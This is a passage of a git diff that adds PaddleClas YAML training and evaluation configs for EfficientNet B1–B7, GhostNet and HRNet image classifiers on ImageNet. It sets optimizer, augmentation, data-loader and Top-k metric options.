./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB1.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB1.yaml new file mode 100644 index 0000000..502be5e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB1.yaml @@ -0,0 +1,133 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: EfficientNetB1 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: RMSProp + momentum: 0.9 + rho: 0.9 + epsilon: 0.001 + lr: + name: Cosine + learning_rate: 0.032 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 240 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 272 + - CropImage: + size: 240 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB2.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB2.yaml new file mode 100644 index 0000000..230d560 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB2.yaml @@ -0,0 +1,133 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: EfficientNetB2 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: RMSProp + momentum: 0.9 + rho: 0.9 + epsilon: 0.001 + lr: + name: Cosine + learning_rate: 0.032 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 260 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 292 + - CropImage: + size: 260 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB3.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB3.yaml new file mode 100644 index 0000000..fcd8c01 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB3.yaml @@ -0,0 +1,133 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: EfficientNetB3 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: RMSProp + momentum: 0.9 + rho: 0.9 + epsilon: 0.001 + lr: + name: Cosine + learning_rate: 0.032 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 300 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 332 + - CropImage: + size: 300 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB4.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB4.yaml new file mode 100644 index 0000000..1f97c71 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB4.yaml @@ -0,0 +1,133 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: EfficientNetB4 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: RMSProp + momentum: 0.9 + rho: 0.9 + epsilon: 0.001 + lr: + name: Cosine + learning_rate: 0.032 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 380 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 412 + - CropImage: + size: 380 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB5.yaml new file mode 100644 index 0000000..94656dc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB5.yaml @@ -0,0 +1,133 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: EfficientNetB5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: RMSProp + momentum: 0.9 + rho: 0.9 + epsilon: 0.001 + lr: + name: Cosine + learning_rate: 0.032 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 456 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 488 + - CropImage: + size: 456 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB6.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB6.yaml new file mode 100644 index 0000000..8da4f00 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB6.yaml @@ -0,0 +1,133 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: EfficientNetB6 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: RMSProp + momentum: 0.9 + rho: 0.9 + epsilon: 0.001 + lr: + name: Cosine + learning_rate: 0.032 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 528 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 560 + - CropImage: + size: 528 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB7.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB7.yaml new file mode 100644 index 0000000..2470cff --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB7.yaml @@ -0,0 +1,133 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: EfficientNetB7 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: RMSProp + momentum: 0.9 + rho: 0.9 + epsilon: 0.001 + lr: + name: Cosine + learning_rate: 0.032 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 600 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 632 + - CropImage: + size: 600 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x0_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x0_5.yaml new file mode 100644 index 0000000..ecf64c0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x0_5.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: GhostNet_x0_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x1_0.yaml new file mode 100644 index 0000000..613aef8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x1_0.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: GhostNet_x1_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x1_3.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x1_3.yaml new file mode 100644 index 0000000..d1d40e0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x1_3.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: GhostNet_x1_3 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W18_C.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W18_C.yaml new file mode 100644 index 0000000..05b4353 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W18_C.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HRNet_W18_C + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: 